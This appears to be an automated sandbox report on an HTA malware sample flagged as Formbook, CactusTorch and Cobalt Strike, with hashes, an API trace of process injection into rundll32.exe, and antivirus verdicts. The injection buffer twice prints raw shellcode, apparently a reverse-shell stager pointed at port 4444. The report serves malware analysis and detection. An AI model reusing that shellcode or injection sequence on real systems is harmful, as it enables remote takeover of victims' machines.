Summary | ZeroBOX

Director.hta

Formbook
Category Machine Started Completed
FILE s1_win7_x6401 Aug. 12, 2024, 11:22 a.m. Aug. 12, 2024, 11:24 a.m.
Size 16.4KB
Type HTML document, ASCII text, with very long lines
MD5 bc97e8b78d54a21fa34fd4be1095c5d9
SHA256 8f1af2913a1a784fb463c94b7dc25c826320ece06bee06b2d8d99589d79034c4
CRC32 AF23B210
ssdeep 384:lNNlqK3X3rIOgiThHHsdQ0lz5q1QgE3LzTWEqmak44Cv7vKjshN2:l/lqI7IOVdsdFlz5mQgE3LzTWEqmYP7c
Yara
  • Win_Trojan_Formbook_Zero - Used Formbook

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
117.18.232.200 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2544
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73bc2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 1179648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03bd0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03cb0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03cb1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03cb2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03cb3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x032f2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x032fc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x032fa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0334b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03347000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x032c3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03345000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x032c4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03cb4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03cb5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x032cc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03b80000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x032ca000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2544
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x7ef80000
process_handle: 0xffffffff
1 0 0
host 117.18.232.200
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2636
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000c0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000033c
1 0 0
Process injection Process 2544 created a remote thread in non-child process 2636
Time & API Arguments Status Return Repeated

CreateRemoteThread

thread_identifier: 0
process_identifier: 2636
function_address: 0x000c0000
flags: 0
stack_size: 0
parameter: 0x00000000
process_handle: 0x0000033c
1 836 0
Process injection Process 2544 manipulating memory of non-child process 2636
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2636
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000c0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000033c
1 0 0
Process injection Process 2544 injected into non-child 2636
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: üè`1Òd‹R0‰å‹R ‹R‹r(·J&1ÿ1À¬<a|, ÁÏ ÇIuïRW‹R‹B<Ћ@x…ÀtLÐP‹X ӋH…Ét<I1ÿ‹4‹Ö1ÀÁÏ ¬Ç8àuô}ø;}$uàX‹X$Óf‹ K‹XӋ‹ЉD$$[[aYZQÿàX_Z‹é€ÿÿÿ]h32hws2_ThLw&‰èÿи)ÄTPh)€kÿÕj hÀ¨Ïh\‰æPPPP@P@Phêßàÿ՗jVWh™¥taÿՅÀt ÿNuìègjjVWhÙÈ_ÿՃø~6‹6j@hVjhX¤SåÿՓSjVSWhÙÈ_ÿՃø}(Xh@jPh /0ÿÕWhunMaÿÕ^^ÿ $…pÿÿÿé›ÿÿÿÃ)ÆuÁûðµ¢VjSÿÕ
base_address: 0x000c0000
process_identifier: 2636
process_handle: 0x0000033c
1 1 0
dead_host 192.168.207.2:4444
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000104
suspend_count: 1
process_identifier: 2544
1 0 0

CreateProcessInternalW

thread_identifier: 2640
thread_handle: 0x00000338
process_identifier: 2636
current_directory:
filepath: C:\Windows\SysWOW64\rundll32.exe
track: 1
command_line:
filepath_r: C:\Windows\SysWOW64\rundll32.exe
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
inherit_handles: 1
process_handle: 0x0000033c
1 1 0

NtAllocateVirtualMemory

process_identifier: 2636
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000c0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000033c
1 0 0

WriteProcessMemory

buffer: üè`1Òd‹R0‰å‹R ‹R‹r(·J&1ÿ1À¬<a|, ÁÏ ÇIuïRW‹R‹B<Ћ@x…ÀtLÐP‹X ӋH…Ét<I1ÿ‹4‹Ö1ÀÁÏ ¬Ç8àuô}ø;}$uàX‹X$Óf‹ K‹XӋ‹ЉD$$[[aYZQÿàX_Z‹é€ÿÿÿ]h32hws2_ThLw&‰èÿи)ÄTPh)€kÿÕj hÀ¨Ïh\‰æPPPP@P@Phêßàÿ՗jVWh™¥taÿՅÀt ÿNuìègjjVWhÙÈ_ÿՃø~6‹6j@hVjhX¤SåÿՓSjVSWhÙÈ_ÿՃø}(Xh@jPh /0ÿÕWhunMaÿÕ^^ÿ $…pÿÿÿé›ÿÿÿÃ)ÆuÁûðµ¢VjSÿÕ
base_address: 0x000c0000
process_identifier: 2636
process_handle: 0x0000033c
1 1 0

NtResumeThread

thread_handle: 0x000003d0
suspend_count: 1
process_identifier: 2544
1 0 0
Lionic Trojan.Script.Dojos.4!c
ClamAV Win.Ransomware.BlackByte-9915811-0
CAT-QuickHeal Script.CactusTorch.46900
McAfee VBS/Cactustorch.a
ALYac VB:Trojan.Valyria.998
VIPRE VB:Trojan.Valyria.998
Sangfor Trojan_Script_Generic_1
Arcabit VB:Trojan.Valyria.998
Cyren VBS/Agent.AUA
Symantec Hacktool.Cactorch
ESET-NOD32 Win32/CobaltStrike.Beacon.A
Avast JS:Agent-EFZ [Trj]
Cynet Malicious (score: 99)
Kaspersky HEUR:Trojan.Script.Dojos.c
BitDefender VB:Trojan.Valyria.998
NANO-Antivirus Trojan.Script.ExpKit.ezonew
MicroWorld-eScan VB:Trojan.Valyria.998
Rising Trojan.Dojos!8.E8EB (TOPIS:E0:0cqFj4OYWGD)
Emsisoft VB:Trojan.Valyria.998 (B)
F-Secure Malware.VBS/Agent.0987
DrWeb VBS.Packed.18
McAfee-GW-Edition VBS/Cactustorch.a
FireEye VB:Trojan.Valyria.998
Sophos ATK/Cactus-F
Ikarus Trojan.JS.SharpShooter
Avira VBS/Agent.0987
Microsoft Trojan:VBS/Nanocore.RN!MTB
ZoneAlarm HEUR:Trojan.Script.Dojos.c
GData VB:Trojan.Valyria.998
Google Detected
AhnLab-V3 HTML/Magnitude.S5
Tencent Html.Win32.Script.504632
MAX malware (ai score=85)
Fortinet VBS/Agent.NYO!tr
AVG JS:Agent-EFZ [Trj]